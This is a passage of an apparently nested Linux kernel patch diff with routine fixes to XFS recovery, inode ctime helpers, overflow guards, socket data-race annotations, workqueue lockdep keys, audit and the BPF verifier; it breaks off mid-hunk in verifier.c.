+diff --git a/fs/xfs/xfs_inode_item_recover.c b/fs/xfs/xfs_inode_item_recover.c
+index 0e5dba2343ea1..e6609067ef261 100644
+--- a/fs/xfs/xfs_inode_item_recover.c
++++ b/fs/xfs/xfs_inode_item_recover.c
+@@ -369,24 +369,26 @@ xlog_recover_inode_commit_pass2(
+ 	 * superblock flag to determine whether we need to look at di_flushiter
+ 	 * to skip replay when the on disk inode is newer than the log one
+ 	 */
+-	if (!xfs_has_v3inodes(mp) &&
+-	    ldip->di_flushiter < be16_to_cpu(dip->di_flushiter)) {
+-		/*
+-		 * Deal with the wrap case, DI_MAX_FLUSH is less
+-		 * than smaller numbers
+-		 */
+-		if (be16_to_cpu(dip->di_flushiter) == DI_MAX_FLUSH &&
+-		    ldip->di_flushiter < (DI_MAX_FLUSH >> 1)) {
+-			/* do nothing */
+-		} else {
+-			trace_xfs_log_recover_inode_skip(log, in_f);
+-			error = 0;
+-			goto out_release;
++	if (!xfs_has_v3inodes(mp)) {
++		if (ldip->di_flushiter < be16_to_cpu(dip->di_flushiter)) {
++			/*
++			 * Deal with the wrap case, DI_MAX_FLUSH is less
++			 * than smaller numbers
++			 */
++			if (be16_to_cpu(dip->di_flushiter) == DI_MAX_FLUSH &&
++			    ldip->di_flushiter < (DI_MAX_FLUSH >> 1)) {
++				/* do nothing */
++			} else {
++				trace_xfs_log_recover_inode_skip(log, in_f);
++				error = 0;
++				goto out_release;
++			}
+ 		}
++
++		/* Take the opportunity to reset the flush iteration count */
++		ldip->di_flushiter = 0;
+ 	}
+ 
+-	/* Take the opportunity to reset the flush iteration count */
+-	ldip->di_flushiter = 0;
+ 
+ 	if (unlikely(S_ISREG(ldip->di_mode))) {
+ 		if ((ldip->di_format != XFS_DINODE_FMT_EXTENTS) &&
+diff --git a/include/linux/damon.h b/include/linux/damon.h
+index 620ada094c3b2..b13be7ae2275e 100644
+--- a/include/linux/damon.h
++++ b/include/linux/damon.h
+@@ -559,6 +559,13 @@ static inline bool damon_target_has_pid(const struct damon_ctx *ctx)
+ 	return ctx->ops.id == DAMON_OPS_VADDR || ctx->ops.id == DAMON_OPS_FVADDR;
+ }
+ 
++static inline unsigned int damon_max_nr_accesses(const struct damon_attrs *attrs)
++{
++	/* {aggr,sample}_interval are unsigned long, hence could overflow */
++	return min(attrs->aggr_interval / attrs->sample_interval,
++			(unsigned long)UINT_MAX);
++}
++
+ 
+ int damon_start(struct damon_ctx **ctxs, int nr_ctxs, bool exclusive);
+ int damon_stop(struct damon_ctx **ctxs, int nr_ctxs);
+diff --git a/include/linux/ethtool.h b/include/linux/ethtool.h
+index 99dc7bfbcd3c3..7dacc109eb251 100644
+--- a/include/linux/ethtool.h
++++ b/include/linux/ethtool.h
+@@ -836,10 +836,10 @@ int ethtool_get_phc_vclocks(struct net_device *dev, int **vclock_index);
+ 
+ /**
+  * ethtool_sprintf - Write formatted string to ethtool string data
+- * @data: Pointer to start of string to update
++ * @data: Pointer to a pointer to the start of string to update
+  * @fmt: Format of string to write
+  *
+- * Write formatted string to data. Update data to point at start of
++ * Write formatted string to *data. Update *data to point at start of
+  * next string.
+  */
+ extern __printf(2, 3) void ethtool_sprintf(u8 **data, const char *fmt, ...);
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index dc745317e1bdb..b6af6abc7a77f 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -1812,7 +1812,50 @@ static inline bool fsuidgid_has_mapping(struct super_block *sb,
+ 	       kgid_has_mapping(fs_userns, kgid);
+ }
+ 
+-extern struct timespec64 current_time(struct inode *inode);
++struct timespec64 current_time(struct inode *inode);
++struct timespec64 inode_set_ctime_current(struct inode *inode);
++
++/**
++ * inode_get_ctime - fetch the current ctime from the inode
++ * @inode: inode from which to fetch ctime
++ *
++ * Grab the current ctime from the inode and return it.
++ */
++static inline struct timespec64 inode_get_ctime(const struct inode *inode)
++{
++	return inode->i_ctime;
++}
++
++/**
++ * inode_set_ctime_to_ts - set the ctime in the inode
++ * @inode: inode in which to set the ctime
++ * @ts: value to set in the ctime field
++ *
++ * Set the ctime in @inode to @ts
++ */
++static inline struct timespec64 inode_set_ctime_to_ts(struct inode *inode,
++						      struct timespec64 ts)
++{
++	inode->i_ctime = ts;
++	return ts;
++}
++
++/**
++ * inode_set_ctime - set the ctime in the inode
++ * @inode: inode in which to set the ctime
++ * @sec: tv_sec value to set
++ * @nsec: tv_nsec value to set
++ *
++ * Set the ctime in @inode to { @sec, @nsec }
++ */
++static inline struct timespec64 inode_set_ctime(struct inode *inode,
++						time64_t sec, long nsec)
++{
++	struct timespec64 ts = { .tv_sec  = sec,
++				 .tv_nsec = nsec };
++
++	return inode_set_ctime_to_ts(inode, ts);
++}
+ 
+ /*
+  * Snapshotting support.
+diff --git a/include/linux/generic-radix-tree.h b/include/linux/generic-radix-tree.h
+index 107613f7d7920..f6cd0f909d9fb 100644
+--- a/include/linux/generic-radix-tree.h
++++ b/include/linux/generic-radix-tree.h
+@@ -38,6 +38,7 @@
+ 
+ #include <asm/page.h>
+ #include <linux/bug.h>
++#include <linux/limits.h>
+ #include <linux/log2.h>
+ #include <linux/math.h>
+ #include <linux/types.h>
+@@ -184,6 +185,12 @@ void *__genradix_iter_peek(struct genradix_iter *, struct __genradix *, size_t);
+ static inline void __genradix_iter_advance(struct genradix_iter *iter,
+ 					   size_t obj_size)
+ {
++	if (iter->offset + obj_size < iter->offset) {
++		iter->offset	= SIZE_MAX;
++		iter->pos	= SIZE_MAX;
++		return;
++	}
++
+ 	iter->offset += obj_size;
+ 
+ 	if (!is_power_of_2(obj_size) &&
+diff --git a/include/linux/lsm_hook_defs.h b/include/linux/lsm_hook_defs.h
+index 4a97a6db9bcec..02b19c508b78f 100644
+--- a/include/linux/lsm_hook_defs.h
++++ b/include/linux/lsm_hook_defs.h
+@@ -48,7 +48,7 @@ LSM_HOOK(int, 0, quota_on, struct dentry *dentry)
+ LSM_HOOK(int, 0, syslog, int type)
+ LSM_HOOK(int, 0, settime, const struct timespec64 *ts,
+ 	 const struct timezone *tz)
+-LSM_HOOK(int, 0, vm_enough_memory, struct mm_struct *mm, long pages)
++LSM_HOOK(int, 1, vm_enough_memory, struct mm_struct *mm, long pages)
+ LSM_HOOK(int, 0, bprm_creds_for_exec, struct linux_binprm *bprm)
+ LSM_HOOK(int, 0, bprm_creds_from_file, struct linux_binprm *bprm, struct file *file)
+ LSM_HOOK(int, 0, bprm_check_security, struct linux_binprm *bprm)
+@@ -266,7 +266,7 @@ LSM_HOOK(void, LSM_RET_VOID, release_secctx, char *secdata, u32 seclen)
+ LSM_HOOK(void, LSM_RET_VOID, inode_invalidate_secctx, struct inode *inode)
+ LSM_HOOK(int, 0, inode_notifysecctx, struct inode *inode, void *ctx, u32 ctxlen)
+ LSM_HOOK(int, 0, inode_setsecctx, struct dentry *dentry, void *ctx, u32 ctxlen)
+-LSM_HOOK(int, 0, inode_getsecctx, struct inode *inode, void **ctx,
++LSM_HOOK(int, -EOPNOTSUPP, inode_getsecctx, struct inode *inode, void **ctx,
+ 	 u32 *ctxlen)
+ 
+ #if defined(CONFIG_SECURITY) && defined(CONFIG_WATCH_QUEUE)
+diff --git a/include/linux/mmc/card.h b/include/linux/mmc/card.h
+index daa2f40d9ce65..7b12eebc5586d 100644
+--- a/include/linux/mmc/card.h
++++ b/include/linux/mmc/card.h
+@@ -295,7 +295,9 @@ struct mmc_card {
+ #define MMC_QUIRK_BROKEN_HPI	(1<<13)		/* Disable broken HPI support */
+ #define MMC_QUIRK_BROKEN_SD_DISCARD	(1<<14)	/* Disable broken SD discard support */
+ #define MMC_QUIRK_BROKEN_SD_CACHE	(1<<15)	/* Disable broken SD cache support */
++#define MMC_QUIRK_BROKEN_CACHE_FLUSH	(1<<16)	/* Don't flush cache until the write has occurred */
+ 
++	bool			written_flag;	/* Indicates eMMC has been written since power on */
+ 	bool			reenable_cmdq;	/* Re-enable Command Queue */
+ 
+ 	unsigned int		erase_size;	/* erase size in sectors */
+diff --git a/include/linux/preempt.h b/include/linux/preempt.h
+index 0df425bf9bd75..8cfcc5d454512 100644
+--- a/include/linux/preempt.h
++++ b/include/linux/preempt.h
+@@ -98,14 +98,21 @@ static __always_inline unsigned char interrupt_context_level(void)
+ 	return level;
+ }
+ 
++/*
++ * These macro definitions avoid redundant invocations of preempt_count()
++ * because such invocations would result in redundant loads given that
++ * preempt_count() is commonly implemented with READ_ONCE().
++ */
++
+ #define nmi_count()	(preempt_count() & NMI_MASK)
+ #define hardirq_count()	(preempt_count() & HARDIRQ_MASK)
+ #ifdef CONFIG_PREEMPT_RT
+ # define softirq_count()	(current->softirq_disable_cnt & SOFTIRQ_MASK)
++# define irq_count()		((preempt_count() & (NMI_MASK | HARDIRQ_MASK)) | softirq_count())
+ #else
+ # define softirq_count()	(preempt_count() & SOFTIRQ_MASK)
++# define irq_count()		(preempt_count() & (NMI_MASK | HARDIRQ_MASK | SOFTIRQ_MASK))
+ #endif
+-#define irq_count()	(nmi_count() | hardirq_count() | softirq_count())
+ 
+ /*
+  * Macros to retrieve the current execution context:
+@@ -118,7 +125,11 @@ static __always_inline unsigned char interrupt_context_level(void)
+ #define in_nmi()		(nmi_count())
+ #define in_hardirq()		(hardirq_count())
+ #define in_serving_softirq()	(softirq_count() & SOFTIRQ_OFFSET)
+-#define in_task()		(!(in_nmi() | in_hardirq() | in_serving_softirq()))
++#ifdef CONFIG_PREEMPT_RT
++# define in_task()		(!((preempt_count() & (NMI_MASK | HARDIRQ_MASK)) | in_serving_softirq()))
++#else
++# define in_task()		(!(preempt_count() & (NMI_MASK | HARDIRQ_MASK | SOFTIRQ_OFFSET)))
++#endif
+ 
+ /*
+  * The following macros are deprecated and should not be used in new code:
+diff --git a/include/linux/pwm.h b/include/linux/pwm.h
+index 161e91167b9c0..5e88f1b591832 100644
+--- a/include/linux/pwm.h
++++ b/include/linux/pwm.h
+@@ -41,8 +41,8 @@ struct pwm_args {
+ };
+ 
+ enum {
+-	PWMF_REQUESTED = 1 << 0,
+-	PWMF_EXPORTED = 1 << 1,
++	PWMF_REQUESTED = 0,
++	PWMF_EXPORTED = 1,
+ };
+ 
+ /*
+diff --git a/include/linux/socket.h b/include/linux/socket.h
+index de3701a2a2129..1db29aab8f9c3 100644
+--- a/include/linux/socket.h
++++ b/include/linux/socket.h
+@@ -376,6 +376,7 @@ struct ucred {
+ #define SOL_MPTCP	284
+ #define SOL_MCTP	285
+ #define SOL_SMC		286
++#define SOL_VSOCK	287
+ 
+ /* IPX options */
+ #define IPX_TYPE	1
+diff --git a/include/linux/string.h b/include/linux/string.h
+index 26ab8928d8661..422606e98cc42 100644
+--- a/include/linux/string.h
++++ b/include/linux/string.h
+@@ -5,7 +5,9 @@
+ #include <linux/compiler.h>	/* for inline */
+ #include <linux/types.h>	/* for size_t */
+ #include <linux/stddef.h>	/* for NULL */
++#include <linux/err.h>		/* for ERR_PTR() */
+ #include <linux/errno.h>	/* for E2BIG */
++#include <linux/overflow.h>	/* for check_mul_overflow() */
+ #include <linux/stdarg.h>
+ #include <uapi/linux/string.h>
+ 
+@@ -14,6 +16,44 @@ extern void *memdup_user(const void __user *, size_t);
+ extern void *vmemdup_user(const void __user *, size_t);
+ extern void *memdup_user_nul(const void __user *, size_t);
+ 
++/**
++ * memdup_array_user - duplicate array from user space
++ * @src: source address in user space
++ * @n: number of array members to copy
++ * @size: size of one array member
++ *
++ * Return: an ERR_PTR() on failure. Result is physically
++ * contiguous, to be freed by kfree().
++ */
++static inline void *memdup_array_user(const void __user *src, size_t n, size_t size)
++{
++	size_t nbytes;
++
++	if (check_mul_overflow(n, size, &nbytes))
++		return ERR_PTR(-EOVERFLOW);
++
++	return memdup_user(src, nbytes);
++}
++
++/**
++ * vmemdup_array_user - duplicate array from user space
++ * @src: source address in user space
++ * @n: number of array members to copy
++ * @size: size of one array member
++ *
++ * Return: an ERR_PTR() on failure. Result may be not
++ * physically contiguous. Use kvfree() to free.
++ */
++static inline void *vmemdup_array_user(const void __user *src, size_t n, size_t size)
++{
++	size_t nbytes;
++
++	if (check_mul_overflow(n, size, &nbytes))
++		return ERR_PTR(-EOVERFLOW);
++
++	return vmemdup_user(src, nbytes);
++}
++
+ /*
+  * Include machine specific inline routines
+  */
+diff --git a/include/linux/sunrpc/clnt.h b/include/linux/sunrpc/clnt.h
+index 770ef2cb57752..c794b0ce4e782 100644
+--- a/include/linux/sunrpc/clnt.h
++++ b/include/linux/sunrpc/clnt.h
+@@ -84,6 +84,7 @@ struct rpc_clnt {
+ 	};
+ 	const struct cred	*cl_cred;
+ 	unsigned int		cl_max_connect; /* max number of transports not to the same IP */
++	struct super_block *pipefs_sb;
+ };
+ 
+ /*
+diff --git a/include/linux/sysctl.h b/include/linux/sysctl.h
+index 780690dc08cda..a207c7ed41bd2 100644
+--- a/include/linux/sysctl.h
++++ b/include/linux/sysctl.h
+@@ -238,6 +238,7 @@ extern void __register_sysctl_init(const char *path, struct ctl_table *table,
+ extern struct ctl_table_header *register_sysctl_mount_point(const char *path);
+ 
+ void do_sysctl_args(void);
++bool sysctl_is_alias(char *param);
+ int do_proc_douintvec(struct ctl_table *table, int write,
+ 		      void *buffer, size_t *lenp, loff_t *ppos,
+ 		      int (*conv)(unsigned long *lvalp,
+@@ -301,6 +302,11 @@ static inline void setup_sysctl_set(struct ctl_table_set *p,
+ static inline void do_sysctl_args(void)
+ {
+ }
++
++static inline bool sysctl_is_alias(char *param)
++{
++	return false;
++}
+ #endif /* CONFIG_SYSCTL */
+ 
+ int sysctl_max_threads(struct ctl_table *table, int write, void *buffer,
+diff --git a/include/linux/trace_events.h b/include/linux/trace_events.h
+index 422f4ca656cf9..c8b5e9781d01a 100644
+--- a/include/linux/trace_events.h
++++ b/include/linux/trace_events.h
+@@ -478,6 +478,7 @@ enum {
+ 	EVENT_FILE_FL_TRIGGER_COND_BIT,
+ 	EVENT_FILE_FL_PID_FILTER_BIT,
+ 	EVENT_FILE_FL_WAS_ENABLED_BIT,
++	EVENT_FILE_FL_FREED_BIT,
+ };
+ 
+ extern struct trace_event_file *trace_get_event_file(const char *instance,
+@@ -616,6 +617,7 @@ extern int __kprobe_event_add_fields(struct dynevent_cmd *cmd, ...);
+  *  TRIGGER_COND  - When set, one or more triggers has an associated filter
+  *  PID_FILTER    - When set, the event is filtered based on pid
+  *  WAS_ENABLED   - Set when enabled to know to clear trace on module removal
++ *  FREED         - File descriptor is freed, all fields should be considered invalid
+  */
+ enum {
+ 	EVENT_FILE_FL_ENABLED		= (1 << EVENT_FILE_FL_ENABLED_BIT),
+@@ -629,6 +631,7 @@ enum {
+ 	EVENT_FILE_FL_TRIGGER_COND	= (1 << EVENT_FILE_FL_TRIGGER_COND_BIT),
+ 	EVENT_FILE_FL_PID_FILTER	= (1 << EVENT_FILE_FL_PID_FILTER_BIT),
+ 	EVENT_FILE_FL_WAS_ENABLED	= (1 << EVENT_FILE_FL_WAS_ENABLED_BIT),
++	EVENT_FILE_FL_FREED		= (1 << EVENT_FILE_FL_FREED_BIT),
+ };
+ 
+ struct trace_event_file {
+@@ -657,6 +660,7 @@ struct trace_event_file {
+ 	 * caching and such. Which is mostly OK ;-)
+ 	 */
+ 	unsigned long		flags;
++	atomic_t		ref;	/* ref count for opened files */
+ 	atomic_t		sm_ref;	/* soft-mode reference counter */
+ 	atomic_t		tm_ref;	/* trigger-mode reference counter */
+ };
+diff --git a/include/linux/workqueue.h b/include/linux/workqueue.h
+index 3ca41b9da6473..5d052e193a85c 100644
+--- a/include/linux/workqueue.h
++++ b/include/linux/workqueue.h
+@@ -222,18 +222,16 @@ static inline unsigned int work_static(struct work_struct *work) { return 0; }
+  * to generate better code.
+  */
+ #ifdef CONFIG_LOCKDEP
+-#define __INIT_WORK(_work, _func, _onstack)				\
++#define __INIT_WORK_KEY(_work, _func, _onstack, _key)			\
+ 	do {								\
+-		static struct lock_class_key __key;			\
+-									\
+ 		__init_work((_work), _onstack);				\
+ 		(_work)->data = (atomic_long_t) WORK_DATA_INIT();	\
+-		lockdep_init_map(&(_work)->lockdep_map, "(work_completion)"#_work, &__key, 0); \
++		lockdep_init_map(&(_work)->lockdep_map, "(work_completion)"#_work, (_key), 0); \
+ 		INIT_LIST_HEAD(&(_work)->entry);			\
+ 		(_work)->func = (_func);				\
+ 	} while (0)
+ #else
+-#define __INIT_WORK(_work, _func, _onstack)				\
++#define __INIT_WORK_KEY(_work, _func, _onstack, _key)			\
+ 	do {								\
+ 		__init_work((_work), _onstack);				\
+ 		(_work)->data = (atomic_long_t) WORK_DATA_INIT();	\
+@@ -242,12 +240,22 @@ static inline unsigned int work_static(struct work_struct *work) { return 0; }
+ 	} while (0)
+ #endif
+ 
++#define __INIT_WORK(_work, _func, _onstack)				\
++	do {								\
++		static __maybe_unused struct lock_class_key __key;	\
++									\
++		__INIT_WORK_KEY(_work, _func, _onstack, &__key);	\
++	} while (0)
++
+ #define INIT_WORK(_work, _func)						\
+ 	__INIT_WORK((_work), (_func), 0)
+ 
+ #define INIT_WORK_ONSTACK(_work, _func)					\
+ 	__INIT_WORK((_work), (_func), 1)
+ 
++#define INIT_WORK_ONSTACK_KEY(_work, _func, _key)			\
++	__INIT_WORK_KEY((_work), (_func), 1, _key)
++
+ #define __INIT_DELAYED_WORK(_work, _func, _tflags)			\
+ 	do {								\
+ 		INIT_WORK(&(_work)->work, (_func));			\
+@@ -681,8 +689,32 @@ static inline long work_on_cpu_safe(int cpu, long (*fn)(void *), void *arg)
+ 	return fn(arg);
+ }
+ #else
+-long work_on_cpu(int cpu, long (*fn)(void *), void *arg);
+-long work_on_cpu_safe(int cpu, long (*fn)(void *), void *arg);
++long work_on_cpu_key(int cpu, long (*fn)(void *),
++		     void *arg, struct lock_class_key *key);
++/*
++ * A new key is defined for each caller to make sure the work
++ * associated with the function doesn't share its locking class.
++ */
++#define work_on_cpu(_cpu, _fn, _arg)			\
++({							\
++	static struct lock_class_key __key;		\
++							\
++	work_on_cpu_key(_cpu, _fn, _arg, &__key);	\
++})
++
++long work_on_cpu_safe_key(int cpu, long (*fn)(void *),
++			  void *arg, struct lock_class_key *key);
++
++/*
++ * A new key is defined for each caller to make sure the work
++ * associated with the function doesn't share its locking class.
++ */
++#define work_on_cpu_safe(_cpu, _fn, _arg)		\
++({							\
++	static struct lock_class_key __key;		\
++							\
++	work_on_cpu_safe_key(_cpu, _fn, _arg, &__key);	\
++})
+ #endif /* CONFIG_SMP */
+ 
+ #ifdef CONFIG_FREEZER
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index d1f81a6d7773b..c726da3b7d68a 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -177,9 +177,9 @@ static inline __be32 nft_reg_load_be32(const u32 *sreg)
+ 	return *(__force __be32 *)sreg;
+ }
+ 
+-static inline void nft_reg_store64(u32 *dreg, u64 val)
++static inline void nft_reg_store64(u64 *dreg, u64 val)
+ {
+-	put_unaligned(val, (u64 *)dreg);
++	put_unaligned(val, dreg);
+ }
+ 
+ static inline u64 nft_reg_load64(const u32 *sreg)
+diff --git a/include/net/sock.h b/include/net/sock.h
+index a1fcbb2a8a2ce..b6027b01c2455 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -2032,21 +2032,33 @@ static inline void sk_tx_queue_set(struct sock *sk, int tx_queue)
+ 	/* sk_tx_queue_mapping accept only upto a 16-bit value */
+ 	if (WARN_ON_ONCE((unsigned short)tx_queue >= USHRT_MAX))
+ 		return;
+-	sk->sk_tx_queue_mapping = tx_queue;
++	/* Paired with READ_ONCE() in sk_tx_queue_get() and
++	 * other WRITE_ONCE() because socket lock might be not held.
++	 */
++	WRITE_ONCE(sk->sk_tx_queue_mapping, tx_queue);
+ }
+ 
+ #define NO_QUEUE_MAPPING	USHRT_MAX
+ 
+ static inline void sk_tx_queue_clear(struct sock *sk)
+ {
+-	sk->sk_tx_queue_mapping = NO_QUEUE_MAPPING;
++	/* Paired with READ_ONCE() in sk_tx_queue_get() and
++	 * other WRITE_ONCE() because socket lock might be not held.
++	 */
++	WRITE_ONCE(sk->sk_tx_queue_mapping, NO_QUEUE_MAPPING);
+ }
+ 
+ static inline int sk_tx_queue_get(const struct sock *sk)
+ {
+-	if (sk && sk->sk_tx_queue_mapping != NO_QUEUE_MAPPING)
+-		return sk->sk_tx_queue_mapping;
++	if (sk) {
++		/* Paired with WRITE_ONCE() in sk_tx_queue_clear()
++		 * and sk_tx_queue_set().
++		 */
++		int val = READ_ONCE(sk->sk_tx_queue_mapping);
+ 
++		if (val != NO_QUEUE_MAPPING)
++			return val;
++	}
+ 	return -1;
+ }
+ 
+@@ -2195,7 +2207,7 @@ static inline void __dst_negative_advice(struct sock *sk)
+ 		if (ndst != dst) {
+ 			rcu_assign_pointer(sk->sk_dst_cache, ndst);
+ 			sk_tx_queue_clear(sk);
+-			sk->sk_dst_pending_confirm = 0;
++			WRITE_ONCE(sk->sk_dst_pending_confirm, 0);
+ 		}
+ 	}
+ }
+@@ -2212,7 +2224,7 @@ __sk_dst_set(struct sock *sk, struct dst_entry *dst)
+ 	struct dst_entry *old_dst;
+ 
+ 	sk_tx_queue_clear(sk);
+-	sk->sk_dst_pending_confirm = 0;
++	WRITE_ONCE(sk->sk_dst_pending_confirm, 0);
+ 	old_dst = rcu_dereference_protected(sk->sk_dst_cache,
+ 					    lockdep_sock_is_held(sk));
+ 	rcu_assign_pointer(sk->sk_dst_cache, dst);
+@@ -2225,7 +2237,7 @@ sk_dst_set(struct sock *sk, struct dst_entry *dst)
+ 	struct dst_entry *old_dst;
+ 
+ 	sk_tx_queue_clear(sk);
+-	sk->sk_dst_pending_confirm = 0;
++	WRITE_ONCE(sk->sk_dst_pending_confirm, 0);
+ 	old_dst = xchg((__force struct dst_entry **)&sk->sk_dst_cache, dst);
+ 	dst_release(old_dst);
+ }
+diff --git a/include/sound/soc-acpi.h b/include/sound/soc-acpi.h
+index 528279056b3ab..1a5f90b0a5463 100644
+--- a/include/sound/soc-acpi.h
++++ b/include/sound/soc-acpi.h
+@@ -67,6 +67,10 @@ static inline struct snd_soc_acpi_mach *snd_soc_acpi_codec_list(void *arg)
+  * @i2s_link_mask: I2S/TDM links enabled on the board
+  * @num_dai_drivers: number of elements in @dai_drivers
+  * @dai_drivers: pointer to dai_drivers, used e.g. in nocodec mode
++ * @subsystem_vendor: optional PCI SSID vendor value
++ * @subsystem_device: optional PCI SSID device value
++ * @subsystem_id_set: true if a value has been written to
++ *		      subsystem_vendor and subsystem_device.
+  */
+ struct snd_soc_acpi_mach_params {
+ 	u32 acpi_ipc_irq_index;
+@@ -79,6 +83,9 @@ struct snd_soc_acpi_mach_params {
+ 	u32 i2s_link_mask;
+ 	u32 num_dai_drivers;
+ 	struct snd_soc_dai_driver *dai_drivers;
++	unsigned short subsystem_vendor;
++	unsigned short subsystem_device;
++	bool subsystem_id_set;
+ };
+ 
+ /**
+diff --git a/include/sound/soc-card.h b/include/sound/soc-card.h
+index 9d31a5c0db33c..40d3023cf0d16 100644
+--- a/include/sound/soc-card.h
++++ b/include/sound/soc-card.h
+@@ -44,6 +44,43 @@ int snd_soc_card_add_dai_link(struct snd_soc_card *card,
+ void snd_soc_card_remove_dai_link(struct snd_soc_card *card,
+ 				  struct snd_soc_dai_link *dai_link);
+ 
++#ifdef CONFIG_PCI
++static inline void snd_soc_card_set_pci_ssid(struct snd_soc_card *card,
++					     unsigned short vendor,
++					     unsigned short device)
++{
++	card->pci_subsystem_vendor = vendor;
++	card->pci_subsystem_device = device;
++	card->pci_subsystem_set = true;
++}
++
++static inline int snd_soc_card_get_pci_ssid(struct snd_soc_card *card,
++					    unsigned short *vendor,
++					    unsigned short *device)
++{
++	if (!card->pci_subsystem_set)
++		return -ENOENT;
++
++	*vendor = card->pci_subsystem_vendor;
++	*device = card->pci_subsystem_device;
++
++	return 0;
++}
++#else /* !CONFIG_PCI */
++static inline void snd_soc_card_set_pci_ssid(struct snd_soc_card *card,
++					     unsigned short vendor,
++					     unsigned short device)
++{
++}
++
++static inline int snd_soc_card_get_pci_ssid(struct snd_soc_card *card,
++					    unsigned short *vendor,
++					    unsigned short *device)
++{
++	return -ENOENT;
++}
++#endif /* CONFIG_PCI */
++
+ /* device driver data */
+ static inline void snd_soc_card_set_drvdata(struct snd_soc_card *card,
+ 					    void *data)
+diff --git a/include/sound/soc.h b/include/sound/soc.h
+index 37bbfc8b45cb2..108617cea9c67 100644
+--- a/include/sound/soc.h
++++ b/include/sound/soc.h
+@@ -911,6 +911,17 @@ struct snd_soc_card {
+ #ifdef CONFIG_DMI
+ 	char dmi_longname[80];
+ #endif /* CONFIG_DMI */
++
++#ifdef CONFIG_PCI
++	/*
++	 * PCI does not define 0 as invalid, so pci_subsystem_set indicates
++	 * whether a value has been written to these fields.
++	 */
++	unsigned short pci_subsystem_vendor;
++	unsigned short pci_subsystem_device;
++	bool pci_subsystem_set;
++#endif /* CONFIG_PCI */
++
+ 	char topology_shortname[32];
+ 
+ 	struct device *dev;
+diff --git a/include/sound/sof.h b/include/sound/sof.h
+index 341fef19e6124..1caeb7bf109b4 100644
+--- a/include/sound/sof.h
++++ b/include/sound/sof.h
+@@ -63,6 +63,14 @@ struct snd_sof_pdata {
+ 	const char *name;
+ 	const char *platform;
+ 
++	/*
++	 * PCI SSID. As PCI does not define 0 as invalid, the subsystem_id_set
++	 * flag indicates that a value has been written to these members.
++	 */
++	unsigned short subsystem_vendor;
++	unsigned short subsystem_device;
++	bool subsystem_id_set;
++
+ 	struct device *dev;
+ 
+ 	/* indicate how many first bytes shouldn't be loaded into DSP memory. */
+diff --git a/include/uapi/linux/vm_sockets.h b/include/uapi/linux/vm_sockets.h
+index c60ca33eac594..ed07181d4eff9 100644
+--- a/include/uapi/linux/vm_sockets.h
++++ b/include/uapi/linux/vm_sockets.h
+@@ -191,4 +191,21 @@ struct sockaddr_vm {
+ 
+ #define IOCTL_VM_SOCKETS_GET_LOCAL_CID		_IO(7, 0xb9)
+ 
++/* MSG_ZEROCOPY notifications are encoded in the standard error format,
++ * sock_extended_err. See Documentation/networking/msg_zerocopy.rst in
++ * kernel source tree for more details.
++ */
++
++/* 'cmsg_level' field value of 'struct cmsghdr' for notification parsing
++ * when MSG_ZEROCOPY flag is used on transmissions.
++ */
++
++#define SOL_VSOCK	287
++
++/* 'cmsg_type' field value of 'struct cmsghdr' for notification parsing
++ * when MSG_ZEROCOPY flag is used on transmissions.
++ */
++
++#define VSOCK_RECVERR	1
++
+ #endif /* _UAPI_VM_SOCKETS_H */
+diff --git a/init/main.c b/init/main.c
+index fe378351e8a95..87a52bdb41d67 100644
+--- a/init/main.c
++++ b/init/main.c
+@@ -533,6 +533,10 @@ static int __init unknown_bootoption(char *param, char *val,
+ {
+ 	size_t len = strlen(param);
+ 
++	/* Handle params aliased to sysctls */
++	if (sysctl_is_alias(param))
++		return 0;
++
+ 	repair_env_string(param, val);
+ 
+ 	/* Handle obsolete-style parameters */
+diff --git a/kernel/audit_watch.c b/kernel/audit_watch.c
+index 65075f1e4ac8c..7a98cd176a127 100644
+--- a/kernel/audit_watch.c
++++ b/kernel/audit_watch.c
+@@ -527,11 +527,18 @@ int audit_exe_compare(struct task_struct *tsk, struct audit_fsnotify_mark *mark)
+ 	unsigned long ino;
+ 	dev_t dev;
+ 
+-	exe_file = get_task_exe_file(tsk);
++	/* only do exe filtering if we are recording @current events/records */
++	if (tsk != current)
++		return 0;
++
++	if (!current->mm)
++		return 0;
++	exe_file = get_mm_exe_file(current->mm);
+ 	if (!exe_file)
+ 		return 0;
+ 	ino = file_inode(exe_file)->i_ino;
+ 	dev = file_inode(exe_file)->i_sb->s_dev;
+ 	fput(exe_file);
++
+ 	return audit_mark_compare(mark, ino, dev);
+ }
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index 64706723624b9..7225cb67c0d3a 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -608,7 +608,11 @@ static __always_inline int bpf_tree_comp(void *key, struct latch_tree_node *n)
+ 
+ 	if (val < ksym->start)
+ 		return -1;
+-	if (val >= ksym->end)
++	/* Ensure that we detect return addresses as part of the program, when
++	 * the final instruction is a call for a program part of the stack
++	 * trace. Therefore, do val > ksym->end instead of val >= ksym->end.
++	 */
++	if (val > ksym->end)
+ 		return  1;
+ 
+ 	return 0;
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index eb3f52be115d6..12d360d80c149 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -978,7 +978,8 @@ static void print_verifier_state(struct bpf_verifier_env *env,
+ 	if (state->in_async_callback_fn)
+ 		verbose(env, " async_cb");
+ 	verbose(env, "\n");
+-	mark_verifier_state_clean(env);
++	if (!print_all)
++		mark_verifier_state_clean(env);
+ }
+ 
+ static inline u32 vlog_alignment(u32 pos)
+@@ -2595,7 +2596,12 @@ static int backtrack_insn(struct bpf_verifier_env *env, int idx,
+ 	if (class == BPF_ALU || class == BPF_ALU64) {
+ 		if (!(*reg_mask & dreg))
+ 			return 0;
+-		if (opcode == BPF_MOV) {
++		if (opcode == BPF_END || opcode == BPF_NEG) {
++			/* sreg is reserved and unused
++			 * dreg still need precision before this insn
++			 */
++			return 0;
++		} else if (opcode == BPF_MOV) {
+ 			if (BPF_SRC(insn->code) == BPF_X) {
+ 				/* dreg = sreg
+ 				 * dreg needs precision after this insn
+@@ -3291,7 +3297,7 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
+ 		   insn->imm != 0 && env->bpf_capable) {
+ 		struct bpf_reg_state fake_reg = {};
